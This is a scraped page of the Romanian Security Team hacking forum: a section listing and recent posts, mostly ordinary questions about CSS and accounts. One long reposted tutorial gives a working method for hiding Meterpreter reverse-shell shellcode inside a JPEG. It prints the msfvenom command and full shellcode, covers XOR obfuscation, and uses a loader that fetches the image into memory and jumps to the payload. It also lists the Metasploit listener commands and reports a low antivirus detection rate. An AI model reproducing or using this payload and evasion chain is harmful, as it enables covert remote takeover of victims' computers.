Forums

  1. Informatii generale

    1. Anunturi importante

      Anunturile importante si regulile forumului. Cititi regulamentu​l inainte de a posta.

      7695
      posts
    2. Bine ai venit

      Bine ati venit pe forumul Romanian Security Team, aici va puteti prezenta (optional)

      17616
      posts
    3. Proiecte RST

      Aici veti putea gasi toate programele, tutorialele, metodele si exploiturile create de catre membrii RST

      4371
      posts
  2. Sectiunea tehnica

    1. Exploituri

      Cele mai noi exploituri, POC-uri sau shellcode-uri

      6864
      posts
    2. Challenges

      Challenge-uri - Wargames, pentru amatorii CTF-urilor

      9608
      posts
    3. Bug Bounty

      Categorie destinata discutiilor referitoare la site-urile care au un program Bug Bounty in desfasurare prin care rasplatesc persoanele care le raporteaza vulnerabilitati

      2026
      posts
    4. Programare

      Coltul programatorilor: C/C++, Visual Basic, .NET, Java, ASM, Shell scripting, Perl, Python

      21855
      posts
    5. Reverse engineering & exploit development

      Tutoriale despre analiza malware, sample-uri, cod sursa, programe utile, reverse engineering si exploit development

      1474
      posts
    6. Mobile phones

      Discutii despre telefoane mobile, root-ing, jailbreak-ing etc.

      11748
      posts
    7. Sisteme de operare si discutii hardware

      Discutii in materie hardware, windows, unix, bsd etc.

      7137
      posts
    8. Electronica

      Discutii generale despre electronica

      2406
      posts
    9. Wireless Pentesting

      Wardriving area, WiFi, Bluetooth si GSM hacking

      3531
      posts
    10. 8445
      posts
  3. Tutoriale

    1. Tutoriale in romana

      Tutoriale in limba romana

      18124
      posts
    2. Tutoriale in engleza

      Tutoriale in limba engleza

      5985
      posts
    3. Tutoriale video

      Tutorialele video

      4921
      posts
  4. Programe

    1. Programe hacking

      Postati aici utilitare cum ar fi sniffere, bruteforcers, fuzzers etc. Nu faceti cereri aici.

      27665
      posts
    2. Programe securitate

      Postati aici programe cum ar fi firewall-uri, antivirusi si programe similare

      2566
      posts
    3. Programe utile

      Programe ce nu se incadreaza in celelalte sectiuni: hack sau securitate

      11941
      posts
    4. Free stuff

      Diverse lucruri utile, fiind excluse root-uri, SMTP-uri, VPS-uri etc.

      8791
      posts
  5. Discutii generale

    1. RST Market

      Orice vanzare/cumparare care are legatura cu frauda online/bancara sau access neautorizat este penalizata cu ban permanent!  Minim 50 de posturi pentru acces!

      22496
      posts
    2. Off-topic

      Discutii pe diverse teme, discutii care nu se incadreaza la celalalte categorii. Doar discutii din domeniul IT!

      135268
      posts
    3. Discutii incepatori

      Daca esti incepator, ai o intrebare simpla sau vrei sa stii mai multe despre un domeniu, aici e sectiunea potrivita

      657
      posts
    4. Stiri securitate

      Stiri din domeniul securitatii IT

      19251
      posts
    5. Ajutor

      Ai o problema si te putem ajuta? Posteaza aici.

      108658
      posts
    6. Cereri

      Cererile se fac doar aici, indiferent de subiect.

      50444
      posts
    7. Sugestii

      Vreti un forum mai bun? Orice sugestie din partea voastra va fi analizata. Doar sugestii pentru site/forum.

      5014
      posts
    8. Linkuri

      Postati aici doar linkurile despre securitate!

      9520
      posts
    9. Cosul de gunoi

      Toate topicurile care au deviat de la raspuns vor fi mutate aici.

      44170
      posts
  • Who's Chatting

  • Topics

  • Posts

    • Completare la cel de mai sus ca nu stateau 5 pe un rand. Letter-spacing e ca sa scoata spatiul dintre elementele inline-block. Please login or register to see this link.
    • Kon-Boot iti face bypass direct, sau in cel mai rau caz, iti da posibilitatea sa iti creezi un user nou cu drepturi de administrator, cu care poti schimba apoi parola contului initial.
    • Please login or register to see this link.
    • Now for the last part. We just need to put this on a web server and make a simple program that will download the image in memory and then jump to it and execute this shellcode.
    • Salut. Cum pot sa fac ca toate elementele sa fie in linie in CSS? Am o pagina php in care block-ul cu codul html care contine niste nume etc se va trece in tag-ul article care tag-ul article ii va apartine lui <Section> <section>     <article>              meamsd              masdmas               kaksa     </article> <section> Numai ca article se va repeta de foarte multe ori, si vreau sa fac asa fiecare article sa fie intr-un border si setat sa fie cate 5 article pe rand si dupa sa treaca pe celalalt, nu stiu cum sa le pun in linie si sa fie doar 5
    • Poti repara, te rog, textul si pentru cei cu tema neagra?   Multumesc anticipat.
    • Please login or register to see this link.   We all know the internet loves cats! I was thinking of how we can combine cats and malware. Then, it struck me!       I occasionally see a particular method of code execution which includes some executable file and an image. Usually, I will see that the program will download the image file and then convert it to a .exe and run it. I think this method is somewhat sloppy and can be improved upon in some ways. One being that the file touches the disk it becomes inspectable to Anti-Virus. To get around this, you can launch it in memory. However, you will have another problem that is that most viruses are executables and that means you will have to fix the IAT and other things in the executable since it will be loaded in a shared address space with another program. A method that I suggest here is that we embed shellcode into an image and have our program allocate heap space, download the image and execute the shellcode within in the image. As mentioned before, It is in memory and won’t be analyzed as easily. For this scenario, we will be using a.JPG file although really anything will do. Things you will need: Windows OS Linux tools Knowledge of Assembly Basic Knowledge of MSFVenom payload generation HexEditor (Please login or register to see this link. ) GCC installed and added in $PATH(comes with codeblocks) Nasm (Please login or register to see this link. ) Nasm added to $PATH Optional: Ollydbg(Please login or register to see this link. ) or x64dbg(Please login or register to see this link. ) Some way of converting ASM instructions into Op Codes, I use the following Ram Michael’s MultiLine Ultimate Assembler Plugin (Please login or register to see this link. ) General Explanation of how this is set up: Since the flow of an executable always follows instructions from top to bottom, we will need to be creative in how we execute our payload in memory. Because when you download a file via HTTP, you will have the response followed by the file that was downloaded. Moreover, because the response is at the top and varies in size, it becomes difficult to predict where we will need to jump to execute this. So what we can do to get around this is to put our payload at the bottom of the image then memcpy the bottom to another space on the heap then jump to it. It will look something like this. An example of what our image should look like with the payload inserted into the image. JPEG image header → FF D8 FF E0 00 10 JFIF ASCII → 4A 46 49 46 Bytes         … Bytes         … End of our payload → CC CC CC CC Middle of Payload → BB BB BB BB Start of payload → AA AA AA AA We, of course, need to allocate need to jump to the AA AA AA AA in the payload and therefore flip it. To do this, we memcpy this to another spot. To have it look like this. Start of payload → AA AA AA AA Middle of Payload → BB BB BB BB End of our payload → CC CC CC CC Once this is done, we can jump to this and execute this without a problem. For this example, I have written my own cheap obfuscator and have XOR’d the bytes which we will XOR back and run my code through the obfuscator. To explain in more detail, my obfuscator Please login or register to see this link.  simple takes the payload and divides them by WORDs then adds FFFF to the front of it. Then it will remove the FFFF (using bit-wise math), then move the WORD over to the first part of the DWORD, then when then will move the other WORD. So it kind of looks like this. Mov eax, FFFFAABB; Moves that value to EAX. And eax, FFFF      ; Removed the FFFF in the front Mov ebx, FFFFCCDD ; Moves that value to EBX Mov ax, bx          ; Makes EAX look like AABBCCDD Push eax          ; Pushes it to the stack. In the end it adds Jmp esp ; Jumps to where our payload is on the stack and executes it. I have added some XORing parts to the Encoder / Decoder, but this is just for added obfuscation. If there is any confusion, please read the code, and you can always paste the output it provides into a binary and see what it does for yourself. Let’s Get to Work: Let’s start by generating a simple payload with MSFVENOM. Of course, you will need to change the LPORT and LHOST to meet your needs. msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=5555 -f c This is what it will output: I will bold the IP in case you want to make a simple change to this (Using this tool Please login or register to see this link. ). “\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30” “\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff” “\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52” “\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1” “\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b” “\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03” “\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b” “\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24” “\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb” “\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c” “\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68” “\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x01\x02\x03\x04\x68\x02″ “\x00\x15\xb3\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea” “\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61” “\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00” “\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83” “\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a” “\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57” “\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00” “\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68” “\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff” “\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00” “\x53\xff\xd5”; So let’s take this and pass it through my Please login or register to see this link.  . Paste your shellcode in the ““SHELLCODE GOES HERE”” spot. To use this, it will require you to compile it and you can simply do this using gcc. Gcc -std=c11 LazyBitmaskEncoder.c -o encoder.exe And then redirect the output to a file. encoder.exe > somefile.txt     Then run it to get your output. In my case, I have an extra byte that is 31. My program warns to turn this into a Nop’d XOR byte, in this case, it was 7E. Like so…   Now we just need the bytes of this. There might be a tool online that will convert assembly to bytecode or elsewhere. I just tend to use Ram Michael’s Please login or register to see this link.  in OllyDbg or X64dbg to paste the instructions in binary and copy then the bytes out. Picture Below   Then we can copy the bytes out by highlighting them and right-clicking -> Edit -> Binary Copy. Alternatively, you can simply press CTRL+ INSERT   Now we need to put these bytes in the bottom of an image. If you saw the diagram at the top, we need to put them in the image in reverse order. Luckily, in Linux, this is very simple to do. Here is an image before the bytes are reversed.   I pasted this into a file (I called mine ‘moo’). Running this we can get the correct order that we need. We can run this command to reverse the order of the bytes in the correct order.   for i in `cat moo` ; do echo $i;done| tac |sed ‘:a;N;$!ba;s/\n/ /g’     Now we just need to insert them into an image for hiding. Take your favorite cat picture. I am choosing this Siamese cat for this demonstration. We will not really see the cat as he will live in memory. Doesn’t he look malicious?!     Ok. Now let’s copy the shellcode into the image. We just need to open this up using Please login or register to see this link.  and copy the bytes in the image. The thing to remember is we want the bytes to be at the bottom. If you do not have it exactly at the bottom, then you will need to add 0x90s until your shellcode starts.     Here is after we paste the Bytes in. As you see our shellcode is at the bottom of the image. Once you save this, you will see that there is some minor color distortion at the bottom of the image.     Now for the last part. We just need to put this on a web server and make a simple program that will download the image in memory and then jump to it and execute this shellcode. The simplest way to accomplish this is in assembly)))). I have written a program in assembly that will do just this; Please login or register to see this link. . To compile this, you can simply run… nasm -f win32 GhostExe.asm gcc -fno-use-linker-plugin GhostExe.obj -o GhostExe.exe I recommend opening up a debugger and attaching to the opening the process and following along and watching it in action just so that you can learn.
        If you choose to debug, then at least look at the program GhostExe.exe at offset00401482. This is right after the recv. If you look at the end of ECX, you will see where the out payload is located. Otherwise just set up Metasploit properly and run the exe and let it go. msf>use exploit multi/handler msf>set payload windows/meterpreter/reverse_tcp msf>set lhost <local IP> msf>set lport <local port> msf> set ExitOnSession false msf>exploit -j Here are the results from NoDistrubute.com — 1/35 is very good for something so simple.   Made Kitties Malicious — Krist The following will be a debug shot!     We make it down to JMP EAX: this is where we will jump into the shellcode in our cat image!     Look familiar?     Our original payload!     #source: Please login or register to see this link.
    • Incearca in Panama, iti cer copie dupa pasaport si minim 750 de $ ca si depozit  cont offshore desigur , ca stiu sigur ce vrei sa faci 😂😂😂